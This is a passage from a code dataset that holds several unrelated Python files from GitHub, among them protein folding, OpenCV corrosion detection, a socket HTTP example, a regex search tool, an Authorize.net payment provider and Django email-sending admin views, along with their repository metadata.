self.allMoves.append(self.minimalPerformedMove)\n\n # place the amino acid on the right place in the grid\n self.grid.performMove(self.minimalPerformedMove, self.protein.code[self.grid.totalMoves])\n self.minimalPerformedMove = None\n self.minimalScore = 0\n print(str(self.grid.totalMoves) + \" of the \" + str(self.protein.length) + \" aminoacid are already placed in the grid\")\n end = time.time()\n print(\"The folding of the protein can be found in the new created png file\")\n print(\"The score of the folding is: \" + str(self.grid.score()))\n print(\"The algorithme has taken: \" + str(end-start) + \" seconds\")\n print(\"total states = \" + str(self.states))\n \n \n def recursion_01(self, grid, allMoves, depth, length, firstMove, numberOfPerformedMoves):\n \"\"\"\n recursion_01 tries to find all possible foldings of \n the protein by looking a set #steps (depth) ahead.\n \"\"\"\n # print the amount of recursions for convenience purposes\n if (self.recursionAmount % 10000 ) == 0 and self.recursionAmount > 0:\n print(\"Recusion Functionis called: \" + str(self.recursionAmount) + \" times\")\n self.recursionAmount = self.recursionAmount + 1\n\n # calculate the score of the grid when the set depth is reached or all amino acids are folded\n if depth == self.lookahead or len(allMoves) == self.length:\n S = grid.score()\n self.states = self.states + 1\n \n # update minimalScore & minimalGrid when a lower score is found(lower is better)\n if S <= self.minimalScore and (len(grid.checkPossibleMoves()) > 0 or self.protein.length == self.grid.totalMoves):\n self.minimalScore = S\n self.minimalGrid = grid\n self.minimalPerformedMove = firstMove\n \n else:\n\n # check the remaining possible moves for the current folding situation\n moves = grid.checkPossibleMoves()\n\n # TODO\n for move in moves:\n allMoves = allMoves[:(depth+(numberOfPerformedMoves))]\n allMoves.append(move)\n \n grid.clearGrid()\n\n for allMove in allMoves:\n grid.performMove(allMove, self.protein.code[grid.totalMoves])\n \n if depth == 0:\n self.recursion_01(grid, allMoves, depth+1, length, move, numberOfPerformedMoves)\n else:\n self.recursion_01(grid, allMoves, depth+1, length, firstMove, numberOfPerformedMoves)\n \n def changeMovesList(self):\n shift = self.protein.length\n self.allMoves = [(a-shift,b-shift) for a,b in self.allMoves]\n\n temp = []\n i = 0\n for tupl in self.allMoves:\n temp.append((self.protein.code[i],tupl))\n i = i + 1\n\n self.allMoves = temp\n\n","repo_name":"hattum/ijwit","sub_path":"algorithms/greedy_lookahead.py","file_name":"greedy_lookahead.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74232055555","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nfrom django.contrib import messages\r\nfrom main.forms import RegisterGameForm\r\nfrom main.models import UserGame\r\n\r\n# Create your views here.\r\n\r\ndef get_index(request):\r\n context_dict={}\r\n\r\n if request.method == 'POST':\r\n form = RegisterGameForm(request.POST)\r\n if form.is_valid():\r\n name = form.cleaned_data['name']\r\n email = form.cleaned_data['email']\r\n\r\n userGame = UserGame()\r\n userGame.name = name\r\n userGame.email = email\r\n userGame.save()\r\n\r\n messages.add_message(request, messages.SUCCESS, 'Dados Salvos com Sucesso!')\r\n else:\r\n form = RegisterGameForm()\r\n\r\n context_dict['form'] = form\r\n \r\n\r\n return render(request, 'index.html', context_dict )\r\n","repo_name":"leonfritas/Landing-Page-CondutaZero92-Python","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23650543521","text":"# Python code for Corrosion Detection\n\nimport numpy as np\nimport cv2\n\n\n# read and capturing image\nimg = cv2.imread(\"tank2.jpeg\", cv2.IMREAD_COLOR)\n\n# Convert the imageFrame in\n# BGR(RGB color space) to\n# HSV(hue-saturation-value)\n# color space\nhsvFrame = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# Set range for corrosion color and\n# define mask\ncorr_lower = np.array([0, 70, 70], np.uint8)\ncorr_upper = np.array([20, 200, 150], np.uint8)\ncorr_mask = cv2.inRange(hsvFrame, corr_lower, corr_upper)\n\t\n# Morphological Transform, Dilation\n# for each corrosion color and bitwise_and operator\n# between imageFrame and mask determines\n# to detect only that particular corrosion color\nkernal = np.ones((5, 5), \"uint8\")\n\t\n# For corrosion color\ncorr_mask = cv2.dilate(corr_mask, kernal)\nres_corr = cv2.bitwise_and(img, img,\n\t\t\t\t\t\tmask = corr_mask)\n\n# Creating contour to track corrosion color\ncontours, hierarchy = cv2.findContours(corr_mask,\n\t\t\t\t\t\t\t\t\tcv2.RETR_TREE,\n\t\t\t\t\t\t\t\t\tcv2.CHAIN_APPROX_SIMPLE)\n\t\nfor pic, contour in enumerate(contours):\n area = cv2.contourArea(contour)\n if(area > 300):\n x, y, w, h = cv2.boundingRect(contour)\n imageFrame = cv2.rectangle(img, (x, y),\n (x + w, y + h),\n (0, 0, 255), 2)\n \n cv2.putText(img, \"Corrosion\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1.0,\n (0, 0, 255))\t\n\t\t\t\n# Program Termination\ncv2.imshow(\"Corrosion Detection\", cv2.resize(img, (1000, 800)))\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"Dr-MarcusI/Computer-Vision-for-Corrosion-Detection","sub_path":"Corrosion_Detection_v1.py","file_name":"Corrosion_Detection_v1.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6002384140","text":"\n# requests -> urllib -> socket\nimport socket\nfrom urllib.parse import urlparse\n\n\ndef get_url(url):\n # 通过sockety请求html\n url = urlparse(url)\n # netloc()是帮我们做了解析,提取主域名\n host = url.netloc\n path = url.path\n if path == \"\":\n path = \"/\"\n\n # 建立连接\n # AF_INET就是指明我们的类型,SOCK_STREAM就是类型对应的协议\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # 第2绑定域名和端口, 0.0.0.0这样可以通过ip访问,如果设置成127.0.0.1通过本机局域网就访问不到了\n client.connect((host, 80))\n\n client.send(\"GET {} HTTP/1.1\\r\\nHost:{}\\r\\nConnection:close\\r\\n\\r\\n\".format(path, host).encode(\"utf8\"))\n\n data = b\"\"\n while True:\n d = client.recv(1024)\n if d:\n data += d\n else:\n break\n data = data.decode(\"utf8\")\n print(data)\n client.close()\n\n\nif __name__ == \"__main__\":\n get_url(\"http://www.baidu.com\")\n\n","repo_name":"tang1323/Ing_Interview","sub_path":"sample/chapter10/socket_http.py","file_name":"socket_http.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13873733079","text":"# 재귀를 통한 완전탐색\n# 시간초과 이므로 프루닝 필요\n\ndef dfs(start, mw, path, summit):\n print(start)\n global intens\n\n if start in summits_:\n return\n\n if start in gates_:\n # print(\"SEX\", intens)\n global tot\n\n if mw <= intens:\n intens = mw\n\n tot.append([intens, summit])\n return\n\n for nn in graph[start]:\n\n node, nw = nn\n if node in path:\n continue\n if nw > intens:\n continue\n else:\n mw_ = max(mw, nw)\n dfs(node, mw_, path + [node], summit)\n\ngates_ = []\nsummits_ = []\nn_ = 0\ngraph = []\ntot = []\nintens = 1e9\n\ndef solution(n, paths, gates, summits):\n global gates_, summits_, n_, graph\n gates_ = gates\n summits_ = summits\n n_ = n + 1\n\n graph = [[] for _ in range(n_)]\n\n for path in paths:\n a, b, c = path\n graph[a].append((b, c))\n graph[b].append((a, c))\n\n\n for summit in summits_:\n print(\"GA\", summit)\n for nd in graph[summit]:\n dfs(nd[0], nd[1], [summit], summit)\n\n tot.sort()\n print(tot)\n # a : intens, b: 봉우리\n a, b = tot[0]\n answer = [b, a]\n return answer\n\nprint(solution(5, [[1, 3, 10], [1, 4, 20], [2, 3, 4], [2, 4, 6], [3, 5, 20], [4, 5, 6]], [1, 2], [5]))\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"카카오기출/등산코스정하기_재귀.py","file_name":"등산코스정하기_재귀.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74923615553","text":"import numpy\nimport copy\n\ndef mutate(ind, prob_mutation = 0.9):\n \"\"\" Mutation function.\"\"\"\n gen_size = len(ind['genotype'])\n new_gen = copy.deepcopy(ind['genotype'])\n for i in range(gen_size):\n if numpy.random.uniform() < prob_mutation:\n new_gen[i] = numpy.random.uniform()\n \n return {'genotype': new_gen}","repo_name":"jessicamegane/pge","sub_path":"pge/core/operators/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"8275676365","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport sys\nimport re\n\n__author__ = 'Mor Kalfon'\n__version__ = '1.0'\n__email__ = 'zefferno@gmail.com'\n__license__ = 'Apache'\n__program_name__ = 're_search'\n__description__ = \"Search for Regular Expression pattern in one or more files\"\n\n\"\"\"\nThis script searches for one or more named input files or lines containing \na match to a regular expression pattern (given on command line as well).\n\"\"\"\n\nclass MatchOutputFormat(object):\n \"\"\" Prototype for match output format \"\"\"\n\n def __init__(self, filename, line_no, line, matches):\n \"\"\"\n Initialize MatchOutputFormat\n \n Arguments:\n filename: (str) File name of the match\n line_no: (int) Line number\n line: (str) Line text\n matches: (list) List of tuples that contain start, end positions for text matches\n \"\"\"\n self.filename = filename\n self.line_no = line_no\n self.line = line\n self.matches = matches\n\n def __str__(self):\n pass\n\n\nclass StandardOutputFormat(MatchOutputFormat):\n \"\"\"Compute string representation of Standard Output Format\"\"\"\n\n def __str__(self):\n if self.matches:\n return '[ Filename: {}, Line: {} ]\\n{}'.format(self.filename, self.line_no, self.line)\n return ''\n\n\nclass MachineOutputFormat(MatchOutputFormat):\n \"\"\"Compute string representation of Machine Output Format\"\"\"\n\n def __str__(self):\n out = ''\n\n # Format match result for each match\n for match in self.matches:\n out += '{}:{}:{}:{}\\n'.format(self.filename,\n self.line_no,\n match[0],\n self.line[match[0]:match[1]])\n return out\n\n\nclass UnderscoreOutputFormat(MatchOutputFormat):\n \"\"\"Compute string representation of Underscore Output Format\"\"\"\n\n def __str__(self):\n if not self.matches:\n return ''\n\n # Build terminal line in list representation\n temp = [' '] * len(self.line)\n\n # Add underscore for matched objects\n for match in self.matches:\n for i in range(match[0], match[1]):\n temp[i] = '^'\n\n return '[ Filename: {}, Line: {} ]\\n{}'.format(self.filename, self.line_no, self.line) + ''.join(temp) + '\\n'\n\n\nclass ColorOutputFormat(MatchOutputFormat):\n \"\"\"Compute string representation of Color Output Format\"\"\"\n\n @staticmethod\n def __get_term_color(color):\n \"\"\"\n Get ansi terminal color code\n \n Arguments:\n color: (str) Color name\n \n Returns:\n Terminal color code\n \"\"\"\n color = color.lower().strip()\n\n if color == 'yellow':\n return '\\033[1;33m'\n elif color == 'none':\n return '\\033[0;0m'\n\n def __str__(self):\n out = ''\n anchor = 0\n\n if not self.matches:\n return out\n\n # Matched text in color\n for match in self.matches:\n out += self.line[anchor:match[0]]\n out += self.__get_term_color('yellow') + self.line[match[0]:match[1]] + self.__get_term_color('none')\n anchor = match[1]\n\n # Append the rest of the string\n out += self.line[self.matches[-1][1]:]\n\n return '[ Filename: {}, Line: {} ]\\n{}'.format(self.filename, self.line_no, out)\n\n\ndef args_parser():\n \"\"\"\n Handle program arguments\n\n Returns:\n Parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser(prog=__program_name__, description=__description__)\n parser.add_argument('pattern', type=str, help='Regular Expression pattern')\n parser.add_argument('file', nargs='*', type=argparse.FileType('r'), default=sys.stdin,\n help='one or more input files, if not specified, stdin is used as input')\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-u', '--underscore', action='store_true',help='prints \"^\" under the matching text')\n group.add_argument('-c', '--color', action='store_true', help='highlights matching text')\n group.add_argument('-m', '--machine', action='store_true', help='generate machine readable output: '\n 'file_name:no_line:start_pos:matched_text')\n\n return parser.parse_args()\n\n\ndef main():\n args = args_parser()\n\n try:\n re_match = re.compile(args.pattern)\n except:\n print(\"ERROR: Check your RexEx input!\")\n else:\n for f in args.file:\n screen_output = ''\n\n for line_no, line in enumerate(f):\n match_list = list()\n line_no += 1\n\n for match in re_match.finditer(line):\n match_list.append(match.span())\n\n if args.color:\n screen_output += str(ColorOutputFormat(f.name, line_no, line, match_list))\n elif args.underscore:\n screen_output += str(UnderscoreOutputFormat(f.name, line_no, line, match_list))\n elif args.machine:\n screen_output += str(MachineOutputFormat(f.name, line_no, line, match_list))\n else:\n screen_output += str(StandardOutputFormat(f.name, line_no, line, match_list))\n\n del match_list\n\n if screen_output:\n print(screen_output)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zefferno/scripts","sub_path":"re_search.py","file_name":"re_search.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26091072795","text":"class DisjointSet:\n def __init__(self, graphs):\n self.roots = graphs\n self.rank = {}\n for k, v in self.roots.items():\n self.rank[k] = 0\n def get(self, x):\n if self.roots[x] != x:\n self.roots[x] = self.get(self.roots[x])\n return self.roots[x]\n def union(self, x, y):\n rootX = self.get(x)\n rootY = self.get(y)\n # if rootX == rootY:\n # return \n # if self.rank[rootX] == self.rank[rootY]:\n # self.roots[rootX] = rootY\n # self.rank[rootX] += 1\n # if self.rank[rootX] > self.rank[rootY]:\n # self.roots[rootX] = rootY\n # else:\n # self.roots[rootY] = rootX\n self.roots[rootX] = rootX\n self.roots[rootY] = rootX\n self.roots[x] = rootX\n self.roots[y] = rootX\n def isConnected(self, u, v):\n return self.get(u) == self.get(v)\nclass Solution:\n def accountsMerge(self, accounts: List[List[str]]) -> List[List[str]]:\n #email map\n parent_store = {}\n graphs = {}\n for r in range(len(accounts)):\n par = accounts[r][0]\n for c in range(1, len(accounts[r])):\n parent_store[accounts[r][c]] = par\n graphs[accounts[r][c]] = accounts[r][c]\n ds = DisjointSet(graphs)\n for i in range(len(accounts)):\n \n for j in range(1, len(accounts[i]) - 1):\n \n ds.union(accounts[i][j], accounts[i][j + 1])\n \n ans = collections.defaultdict(list)\n for k, v in ds.roots.items():\n pr = ds.get(k)\n ans[pr].append(k)\n res = []\n for key, val in ans.items():\n temp = [parent_store[key]]\n temp.extend(sorted(val))\n res.append(temp)\n return res","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"accounts-merge.py","file_name":"accounts-merge.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32704513246","text":"from utils.inference import inference\r\nimport numpy as np\r\nfrom medpy import metric\r\nimport time\r\n\r\n\r\ndef average_performance(targets, segmentations, performance_func):\r\n arr = zip(targets, segmentations)\r\n s = 0\r\n for target, segmentation in arr:\r\n s += performance_func(segmentation, target)\r\n return s/len(targets)\r\n\r\n\r\ndef get_average_metric(net, dataset, metric_name):\r\n performance_func_arr = {\r\n 'dice': metric.dc,\r\n 'sensitivity': metric.sensitivity,\r\n 'specificity': metric.specificity,\r\n 'precision': metric.precision,\r\n 'assd': metric.assd\r\n }\r\n\r\n targets = []\r\n segmentations = []\r\n print(f'开始计算 average {metric_name} 指标,共需测试{len(dataset)}个样本')\r\n for ct, target_mask in dataset:\r\n targets.append(target_mask[0])\r\n output = inference(net, ct[0], binary=True)\r\n segmentations.append(output)\r\n performance = average_performance(targets, segmentations, performance_func=performance_func_arr[metric_name])\r\n print(f'指标计算结束,average {metric_name}:{performance}')\r\n return performance\r\n\r\n\r\ndef get_all_metrics(net, dataset):\r\n performance_func_arr = {\r\n 'dice': metric.dc,\r\n 'sensitivity': metric.sensitivity,\r\n 'specificity': metric.specificity,\r\n 'precision': metric.precision,\r\n 'assd': metric.assd\r\n }\r\n\r\n metrics = dict()\r\n\r\n targets = []\r\n segmentations = []\r\n print(f\"开始计算指标,共需测试{len(dataset)}个样本\")\r\n print('正在进行 性能average 指标计算')\r\n t = time.time()\r\n for ct, target_mask in dataset:\r\n targets.append(target_mask[0])\r\n output = inference(net, ct[0], binary=True)\r\n segmentations.append(output)\r\n\r\n average_time = (time.time()-t)/len(dataset)\r\n key = 'average inference time'\r\n metrics[key] = average_time\r\n\r\n print(f'正在进行 效果average 指标计算')\r\n print(f'{key}:{average_time}')\r\n for metric_name in performance_func_arr:\r\n performance = average_performance(targets, segmentations, performance_func=performance_func_arr[metric_name])\r\n key = 'average '+metric_name\r\n value = performance\r\n print(f'{key}:{value}')\r\n metrics[key] = value\r\n print('指标计算结束')\r\n return metrics\r\n\r\n\r\n# 下面是具体的指标计算方法,输入输出都是图像的二维numpy数组\r\n\r\n\r\n# # dice指标\r\n# def dice(tar, seg):\r\n# # 用来防止分母为0\r\n# smooth = 1\r\n# intersection = (tar.flatten()*seg.flatten()).sum()\r\n# return (2 * intersection + smooth)/(tar.sum()+seg.sum()+smooth)\r\n#\r\n#\r\n# # 精确度指标\r\n# def PPV(tar, seg):\r\n# predict = np.atleast_1d(seg.astype(np.bool))\r\n# target = np.atleast_1d(tar.astype(np.bool))\r\n#\r\n# tp = np.count_nonzero(predict & target)\r\n# fp = np.count_nonzero(predict & ~target)\r\n#\r\n# try:\r\n# p = tp / float(tp + fp)\r\n# except ZeroDivisionError:\r\n# p = 0.0\r\n# return p\r\n\r\n\r\n","repo_name":"HeLingfei/Circle-UNet","sub_path":"utils/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9336816741","text":"from resorts import verify_input\r\nfrom message import carriers\r\n\r\ndef validate_args(args):\r\n if not verify_input(args.mountain):\r\n return False\r\n\r\n date = args.date.split('/')\r\n if (len(date) != 3 or len(date[0]) != 2 or len(date[1]) != 2 or len(date[2]) != 4\r\n or not date[0].isdigit() or not date[1].isdigit() or not date[2].isdigit()):\r\n return False\r\n\r\n if ((args.phone and not args.carrier) or (args.phone and not args.phone.isdigit())\r\n or (args.carrier and args.carrier not in carriers)):\r\n return False\r\n\r\n return True\r\n","repo_name":"daltonherrold/Lift_Tickets","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"10060324523","text":"from os import PathLike\nfrom allocation_language.alloc_lang_data_containers.event_dataclasses import EventData\nimport allocation_language.lexer as lexer_module\nfrom allocation_language.parser import parser\nimport random\nimport sys\n\ndef _make_contract(text_content: str):\n lexer = lexer_module.make_new_lexer()\n token_stream = lexer.lex(text_content)\n \n contract = parser.parse(token_stream)\n return contract\n \ndef make_contract_from_file(file_src: PathLike):\n with open(file_src, \"r\") as src_file:\n return _make_contract(src_file.read())\n\ndef make_contract_from_text(text_content: str):\n return _make_contract(text_content)\n\ndef make_test_events(n=10):\n for _ in range(n):\n yield EventData(\n data = {\n \"type\": random.choice(['A', 'B', 'C']),\n \"claim\": random.randint(1, 5e5),\n \"liable\": 0,\n \"revenue\": random.randint(1, 5e5)\n }\n )\n\n\n\"\"\" Testing code, not part of library. \"\"\"\ndef _test_contract():\n contract = make_contract_from_file(f\"./src/allocation_language/test_files/{sys.argv[1]}\")\n contract.update(\"testvar\", 1e5)\n events = list(make_test_events(50000))\n events = contract.evaluate_stream(events)\n for event in events:\n print(event)\n \ndef __main():\n import cProfile\n import pstats\n\n with cProfile.Profile() as pr:\n _test_contract()\n\n stats = pstats.Stats(pr)\n stats.sort_stats(pstats.SortKey.TIME)\n # stats.print_stats()\n stats.dump_stats('profiling_test_stats.prof')\n\nif __name__ == \"__main__\":\n __main()","repo_name":"tm2josep/allocation_language","sub_path":"src/allocation_language/make_contract.py","file_name":"make_contract.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18150219827","text":"import sys\nfrom itertools import combinations\nsys.stdin = open('input.txt', \"r\")\n\nN,L,R,X = map(int, sys.stdin.readline().rstrip().split())\nnumbers = list(map(int, sys.stdin.readline().rstrip().split()))\n\nanswer = 0\nfor i in range (2,N+1):\n for c in combinations(numbers,i):\n hap = sum(c)\n upper = max(c)\n lower = min(c)\n \n if L <= hap <= R and upper-lower >= X:\n answer += 1\nprint(answer)","repo_name":"aver1001/Problem-Solving","sub_path":"풀이 완료/16938/acmicpc.py","file_name":"acmicpc.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20476418718","text":"from unidecode import unidecode\nimport urllib2\nfrom django.utils.translation import ugettext as _\nfrom satchless.delivery.models import DeliveryVariant, PhysicalShippingVariant\nfrom satchless.payment import PaymentProvider, PaymentFailure\nfrom authorizenet.utils import process_payment\n\nfrom . import forms\nfrom . import models\n\nclass AuthorizeNetProvider(PaymentProvider):\n unique_id = 'authorize.net'\n form_class = forms.PaymentForm\n\n def __init__(self, capture=True):\n self.capture = capture\n\n def enum_types(self, order=None, customer=None):\n return (('authorizenet', 'Authorize.net'),)\n\n def get_configuration_form(self, order, typ, data):\n instance = models.AuthorizeNetVariant(order=order, price=0)\n return self.form_class(data or None, instance=instance)\n\n def create_variant(self, order, typ, form):\n return form.save()\n\n def get_shipping_data(self, order):\n result = {}\n for dg in order.groups.all():\n try:\n shipping = dg.deliveryvariant.get_subtype_instance()\n if isinstance(shipping, PhysicalShippingVariant):\n result['ship_to_first_name'] = shipping.shipping_first_name\n result['ship_to_last_name'] = shipping.shipping_last_name\n result['ship_to_company'] = shipping.shipping_company_name\n address = filter(None,\n [shipping.shipping_street_address_1,\n shipping.shipping_street_address_2])\n result['ship_to_address'] = '\\n'.join(address)\n result['ship_to_city'] = shipping.shipping_city\n result['ship_to_state'] = shipping.shipping_country_area\n result['ship_to_zip'] = shipping.shipping_postal_code\n result['ship_to_country'] = shipping.get_shipping_country_display()\n break\n except DeliveryVariant.DoesNotExist:\n pass\n return result\n\n def get_billing_data(self, order):\n result = {}\n result['first_name'] = order.billing_first_name\n result['last_name'] = order.billing_last_name\n result['company'] = order.billing_company_name\n address = filter(None,\n [order.billing_street_address_1,\n order.billing_street_address_2])\n result['address'] = '\\n'.join(address)\n result['city'] = order.billing_city\n result['state'] = order.billing_country_area\n result['zip'] = order.billing_postal_code\n result['country'] = order.get_billing_country_display()\n result['phone'] = order.billing_phone\n if order.user:\n result['cust_id'] = str(order.user.pk)\n result['email'] = order.user.email\n return result\n\n def confirm(self, order):\n v = order.paymentvariant.get_subtype_instance()\n trans_type = self.capture and 'AUTH_CAPTURE' or 'AUTH_ONLY'\n data = {\n 'card_num': v.cc_number,\n 'exp_date': v.cc_expiration,\n 'amount': order.total().gross,\n 'invoice_num': order.pk,\n 'type': trans_type,\n }\n if v.cc_cvv2:\n data['card_code'] = v.cc_cvv2\n data.update(self.get_billing_data(order))\n data.update(self.get_shipping_data(order))\n data = dict((k, unidecode(v) if isinstance(v, unicode) else v)\n for k, v in data.items())\n try:\n response = process_payment(data, {})\n except urllib2.URLError:\n raise PaymentFailure(_(\"Could not connect to the gateway.\"))\n v.cc_cvv2 = '' # Forget the CVV2 number immediately after the transaction\n v.response = response\n v.save()\n if not response.is_approved:\n raise PaymentFailure(response.response_reason_text)\n\nclass AuthorizeNetPreauthProvider(AuthorizeNetProvider):\n def __init__(self):\n return super(AuthorizeNetPreauthProvider, self).__init__(capture=False)\n","repo_name":"tbarbugli/satchless_heroku_skeleton","sub_path":"py/satchless/contrib/payment/authorizenet_provider/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23575581291","text":"import numpy as np\n\n\ndef arrange(initials):\n for i in range(len(initials)):\n prev_val = '?'\n for j in range(len(initials[0])):\n if (initials[i])[j] != '?':\n prev_val = (initials[i])[j]\n else:\n (initials[i])[j] = prev_val\n # print(initials)\n return initials\n\n\ndef reverse(hlist):\n rev = []\n for l in hlist:\n rev.append(l[::-1])\n return rev\n\n\ndef run():\n inp = input()\n R, C = (int(i) for i in inp.split(' '))\n hlist = []\n for index in range(R):\n hlist.append(list(input()))\n\n hlist = arrange(hlist)\n hlist = reverse(arrange(reverse(hlist)))\n\n hlist = np.array(hlist)\n\n hlist = arrange(hlist.T)\n hlist = reverse(arrange(reverse(hlist)))\n hlist = np.array(hlist).T\n\n for x in hlist:\n print(''.join(x))\n\n\nif __name__ == '__main__':\n for case in range(int(input())):\n print(\"Case #%d: \" % (case + 1))\n run()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_203/440.py","file_name":"440.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28096922469","text":"class Solution:\n def __init__(self, str1, str2, length1, length2):\n self.str1 = str1\n self.str2 = str2\n self.n = length1\n self.m = length2\n self.memo = list()\n\n for i in range(self.n + 1):\n row = list()\n for j in range(self.m + 1):\n row.append(-1)\n self.memo.append(row)\n for x in self.memo:\n print(x)\n\n def solve(self):\n return self.get_lcs(self.n, self.m)\n\n def get_lcs(self, n, m):\n print(f'n: {n}, m: {m}')\n if n == 0 or m == 0:\n return 0\n\n if self.memo[n][m] != -1:\n return self.memo[n][m]\n else:\n if self.str1[n-1] == self.str2[m-1]:\n value = 1 + self.get_lcs(n-1, m-1)\n self.memo[n][m] = value\n return value\n\n if self.str1[n-1] != self.str2[m-1]:\n value = max(self.get_lcs(n-1, m), self.get_lcs(n, m-1))\n self.memo[n][m] = value\n return value\n\nif __name__ == '__main__':\n a1 = 'abcdgrh'\n a2 = 'abedfhr'\n obj = Solution(a1, a2, len(a1), len(a2))\n ans = obj.solve()\n print(ans)\n","repo_name":"navkant/ds_algo_practice","sub_path":"dynamic_programming2/lcs/lcs_memo.py","file_name":"lcs_memo.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14797083588","text":"import re\nfrom io import BytesIO\n\nfrom django.contrib.auth.decorators import permission_required, login_required\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.template import Template, Context\nfrom django.utils import timezone\nfrom django.utils.translation import gettext as _\nfrom xlsxwriter import Workbook\n\nfrom juntagrico import version\nfrom juntagrico.config import Config\nfrom juntagrico.dao.mailtemplatedao import MailTemplateDao\nfrom juntagrico.dao.memberdao import MemberDao\nfrom juntagrico.dao.sharedao import ShareDao\nfrom juntagrico.dao.subscriptiondao import SubscriptionDao\nfrom juntagrico.dao.subscriptionpartdao import SubscriptionPartDao\nfrom juntagrico.dao.subscriptionsizedao import SubscriptionSizeDao\nfrom juntagrico.entity.depot import Depot\nfrom juntagrico.entity.jobs import ActivityArea\nfrom juntagrico.entity.member import Member\nfrom juntagrico.entity.share import Share\nfrom juntagrico.mailer import append_attachements\nfrom juntagrico.mailer import formemails\nfrom juntagrico.util import return_to_previous_location, addons\nfrom juntagrico.util.management_list import get_changedate\nfrom juntagrico.util.pdf import return_pdf_http\nfrom juntagrico.util.subs import subscriptions_with_assignments\nfrom juntagrico.util.views_admin import subscription_management_list\nfrom juntagrico.util.xls import generate_excel\nfrom juntagrico.view_decorators import any_permission_required\nfrom juntagrico.views_subscription import error_page\n\n\n@permission_required('juntagrico.can_send_mails')\ndef send_email(request):\n return send_email_intern(request)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef send_email_depot(request):\n return send_email_intern(request)\n\n\n@permission_required('juntagrico.is_area_admin')\ndef send_email_area(request):\n return send_email_intern(request)\n\n\n@any_permission_required('juntagrico.is_area_admin', 'juntagrico.can_send_mails')\ndef send_email_job(request):\n return send_email_intern(request)\n\n\ndef send_email_intern(request):\n sent = 0\n if request.method != 'POST':\n raise Http404\n emails = set()\n sender = request.POST.get('sender')\n if request.POST.get('allsubscription') == 'on':\n m_emails = MemberDao.members_for_email_with_subscription().values_list('email',\n flat=True)\n emails.update(m_emails)\n if request.POST.get('allshares') == 'on':\n emails.update(MemberDao.members_for_email_with_shares(\n ).values_list('email', flat=True))\n if request.POST.get('all') == 'on':\n emails.update(MemberDao.members_for_email(\n ).values_list('email', flat=True))\n if request.POST.get('recipients'):\n emails.update(re.split(r'[\\s,;]+', request.POST.get('recipients')))\n if request.POST.get('allsingleemail'):\n emails.update(re.split(r'[\\s,;]+', request.POST.get('singleemail')))\n\n files = []\n append_attachements(request, files)\n\n if len(emails) > 0:\n formemails.internal(\n request.POST.get('subject'),\n request.POST.get('message'),\n request.POST.get('textMessage'),\n emails, files, sender=sender\n )\n sent = len(emails)\n return redirect('mail-result', numsent=sent)\n\n\n@any_permission_required('juntagrico.can_send_mails',\n 'juntagrico.is_depot_admin',\n 'juntagrico.is_area_admin')\ndef send_email_result(request, numsent):\n renderdict = {\n 'sent': numsent\n }\n return render(request, 'mail_sender_result.html', renderdict)\n\n\n@permission_required('juntagrico.can_send_mails')\ndef mails(request, mail_url='mail-send'):\n return my_mails_intern(request, 